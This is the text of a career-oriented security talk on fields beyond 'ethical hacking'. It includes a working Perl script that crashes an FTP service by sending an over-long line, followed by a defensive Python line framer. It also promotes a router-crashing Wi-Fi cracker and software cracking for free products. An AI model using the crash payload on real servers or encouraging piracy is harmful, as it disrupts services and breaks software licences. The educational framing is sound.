Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd
Life Beyond Ethical Hacking: “The Actual Information Security”
By: Nipun Jaswal (CSA, HCF Infosec Pvt. Ltd.)
Acknowledgements
Dr. H.S Johal
Ms. Himanshi
Lil About My Self
• Certified With C|EH, CISE, AFCEH
• Associated With over 9 Companies
• Ambassador, EC-COUNCIL
• Creator Of India’s First DLP on Web Application Penetration Testing Course
• Student @ LPU
• Tested Over 90+ Servers
• Currently working as Chief Security Analyst at HCF Infosec Pvt. Ltd
Let's Go Old School: What is Ethical Hacking?
• Breaking Into Devices, Networks Legally.
• Securing Servers, Recovering Emails etc.
• But the Question Remains!
• Where to get these jobs?
Jobs And Stats
Why More Jobs and Less People ?
• Emerging Technology
• Still Register Work
• Don’t want to spend money
• Find it too difficult
• People Feel they can learn hacking in 2 days workshop :-P
• No Proper facilities of required courses
Salary Packages
• Normal B.tech: 300K-400K
• BPO: 100K-250K
• DEVELOPMENT: 300K-700K
• SECURITY: 600K-1300K
Beyond So Called “Ethical Hacking”
• Web Application Penetration testing
• Exploit Writing
• Reverse Engineering
• Malware Analysis
• Computer Forensics
• Protocol Analysis
Why To Go Beyond Ethical Hacking?
Jobs For Ethical Hacker:-
• Trainer
• Trainer
• Trainer
• Trainer
• And Trainer
Salary Around: 15K + Incentives
Jobs Beyond Ethical Hacking:-
Jobs For Hackers:-
• Researchers
• Technical Heads
• Penetration testers
• Forensic Investigators
Salary Around: 300-400K Per Month
Benefits of not Being a Hacker
Benefits of Being a Hacker
I M UR WORST NIGHTMARE :-P
How To Let Your Dreams Come True?
Some Highly Paid Fields:-
• WAPT – Involves Testing of Web Applications, Websites, Servers, Source code Auditing.
• Exploit Writing – Finding Vulnerabilities in software and Possibly Exploiting the Software.
• Reverse Engineering – Software cracking, Patches, Modifying Features of an end product
How To Let Your Dreams Come True?
Some Highly Paid Fields:-
• Wireless Testing: Involves Network Security infrastructure build up, Managing Networks, System Administration etc.
• Projects: Good At Coding? Show to the whole world.
• Forensics: Highest Paid Job in the entire list. Takes A lot, And Pays A lot
Why We Need More People ?
Source: Indian Express
Why We Need More People ?
Source: Times Of India
Host Gator Hacked !! 3 Lac Websites Owned By Hackers
Source: SoftPedia
Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd..
Source: Private
Norton India Hacked !!
Source: Private
Norton India’s Database Hacked !!
Source: Private
The Biggest Of All… Anonymous!!
Source: National Post
Now Beyond The Word ‘Ethical’
Web Application Penetration Testing:-
• Find Bugs In Web Applications – Custom Made, Open Source Applications.
• Bugs which may compromise the security, make it vulnerable, or help an attacker steal sensitive information
• Now How To Perform 1 Out of 300 Tests In a Web Application Pen-Test?
• Let's See a Simple Example – SQL Injection Bypass
Rise Of The Web Applications
Fasten Your Seat Belts , Its Showtime
DEMO
Now Beyond The Word ‘Ethical’
Exploit Writing
• Potentially writing code to exploit a vulnerability.
• Highly paid: software is vulnerable to exploits, which may further lead to compromise of the entire system.
• Requirement: C, C++, Perl, Python, Ruby, Assembly language
Now Beyond The Word ‘Ethical’
Simplest of The Exploit in Perl - Crashing A Secure Port FTP Server

```perl
use strict;
use Socket;

# 1000 bytes of "A" (0x41), sent as one over-long line
my $junk  = "\x41" x 1000;
my $host  = shift || '192.168.15.1';   # host, first command-line argument
my $port  = shift || 200;              # port, second command-line argument
my $proto = getprotobyname('tcp');
my $iaddr = inet_aton($host);
my $paddr = sockaddr_in($port, $iaddr);

print "[+] Setting up socket\n";
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
print "[+] Connecting to $host on port $port\n";
connect(SOCKET, $paddr) or die "connect: $!";
print "[+] Sending payload\n";
print SOCKET $junk."\n";
print "[+] Payload sent\n";
close SOCKET or die "close: $!";
```
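The script above sends a single 1000-byte line of "A" to a listening service. As an added example that is not from the original slides, this is one way a line-based server can frame its input so that an over-long line is rejected and memory use stays bounded; the 512-byte cap, the class name and the event names are assumptions.

```python
MAX_LINE = 512  # assumed cap for one command line; not a value from the slides

class LineFramer:
    """Split a TCP byte stream into command lines, refusing oversized ones."""

    def __init__(self, max_line=MAX_LINE):
        self.max_line = max_line
        self.buf = bytearray()
        self.discarding = False  # True while skipping the tail of an oversized line

    def feed(self, chunk):
        """Consume one received chunk; return ('line', bytes) / ('too_long', None) events."""
        events = []
        self.buf += chunk
        while True:
            nl = self.buf.find(b"\n")
            if nl == -1:
                if len(self.buf) > self.max_line:
                    # Over the cap with no newline yet: report once, drop the
                    # bytes, and keep skipping until the newline arrives.
                    if not self.discarding:
                        events.append(("too_long", None))
                    self.discarding = True
                    self.buf.clear()
                return events
            line = bytes(self.buf[:nl]).rstrip(b"\r")
            del self.buf[:nl + 1]
            if self.discarding:
                self.discarding = False          # tail of a line already reported
            elif len(line) > self.max_line:
                events.append(("too_long", None))
            else:
                events.append(("line", line))

if __name__ == "__main__":
    framer = LineFramer()
    # Constructed input: the same shape as the payload above, then a normal command.
    print(framer.feed(b"A" * 1000 + b"\n"))
    print(framer.feed(b"USER demo\r\n"))
```

A server would answer a `too_long` event with an error reply (FTP uses reply code 500 for a command line that is too long) and carry on with the next line.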
Now Beyond The Word ‘Ethical’
Prices for Various Exploits
Now Beyond The Word ‘Ethical’
Reverse Engineering
• Editing the final software to find serial keys, stop the online authentications
• Mostly used by pirates
• Sometimes used to edit the features of a final software
• Make your Life easier with free products
Now Beyond The Word ‘Ethical’
Wireless Penetration Testing
• Involves Auditing of Network Security Over Wireless
• Installation of Servers And Security Devices
• Crack proofing Wireless Passwords
• Highly paid
• Requires Networking Background
INSANITY WIFI CRACKER
Insanity Wi-fi Cracker
• Developed By me and my Friends for minor project
• Automates the cracking of various wifi securities
• Performs self MITM attack
• DOS Service Can Crash the Routers For Ever :-P
• Even an 8 Years old can press the button ‘c’ for cracking and no. for a particular AP to crack
Wi-fi Cracking At a Click Of a Button
DEMO
So A One Last Question , Wanna go this ?
Or Wanna Go This ?
After All
It’s your Career
|Handle it with care|
Any Questions ?
Contact
Email: [email protected]/nipun.jaswal
www.hatcon.in
www.hcf.co.in
www.starthack.com
www.cyber-rog.com/h3ll
www.pentest.co.in